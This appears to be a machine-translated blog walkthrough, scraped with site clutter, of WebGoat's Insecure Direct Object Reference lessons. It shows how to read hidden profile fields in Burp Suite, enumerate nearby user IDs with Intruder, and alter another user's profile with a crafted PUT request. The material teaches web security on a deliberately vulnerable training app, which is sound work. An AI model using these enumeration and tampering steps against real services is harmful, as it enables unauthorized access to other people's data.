WebGoat (A5) Broken Access Control - Insecure Direct Object References

Others 2021-03-28 21:38:11 views: null

table of Contents

One, simply pass a level

page 2

Page 3

Page 4

Page 5

2. Do you still need a brain map for the course? .

One, simply pass a level

Looking at the title, I thought it was something unpredictable, but I didn't expect it to be. . . Unauthorized loopholes. . .

page 2

This page only needs to log in with the user name tom and the password cat for subsequent operations.

Page 3

This question requires finding out the attributes in the response message that are not displayed on the web page.

Just press View Profile and compare the content displayed on the web page with the response message captured by burpsuite.

Page 4

This page requires direct object reference to view your profile.

From the last round of burpsuite capture, the path of the profile is /WebGoat/IDOR/profile, and the userId is 2342384

I tried WebGoat/IDOR/profile?userId=2342384 and WebGoat/IDOR/profile/2342384 and found that the answer is:

WebGoat / IDOR / profile / 2342384


 

Page 5

There are two tasks on this page:

(1) Look at the profile of other users

(2) Modify the profile of other users (Buffalo Bill)

Let's look at the first task first, and look at the profiles of other users:

Click the first View Profile button in the figure above, burpsuite captures the packet, and find the message shown in the figure below, send to intruder

In intruder, set the highlighted part in the above picture to the payload position, and select sniper for the attack type

The payload is set as shown in the figure below, and the type is Numbers.

Since Tom’s own userId is 2342384, another user may not be too far away. At the beginning, you can set the blasting range to be smaller. For example, set it to 2342370~2342400 as shown in the figure below, with a step size of 1.

The result of the blasting is shown in the figure below. After sorting by Length, the profile of user Buffalo Bill is successfully found

Let's complete the second task:

Send the corresponding request message in the above figure to repeater

Then modify 3 places according to the following figure:

(1) The request method is changed from GET to PUT

(2) Change Content-type to application/json

(3) In the request content, construct the Buffalo Bill profile in json format. According to the requirements of the title, the role should be set to a number smaller than 3, and the color should be set to red.

2. Do you still need a brain map for the course? .

Guess you like

Origin blog.csdn.net/elephantxiang/article/details/114855007
Recommended
Rushing to the GitHub hot list——How can open source programming languages and frameworks be so cute?
Beijing Humanoid Robot Innovation Center launches Tiangong, the world's first full-size humanoid robot with purely electric drive for anthropomorphic running
Ranking
8个无需编写代码即可使用 Python 内置库的方法
Java collections interview knowledge Lite
Machine learning algorithms foundation - Introduction a (watermelon materials for the book)
(Easy) Ransom Note - LeetCode
[Five days] Qt from entry to actual combat: the second day
Remember once extremely pit father can not download Maven Jar package of issues: IDEA question
The minimum cost Shortest
OSPF study map (the most complete version)
Network Takeaways
GnuPG
Daily
More
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)

Code World

© 2018 codetd.com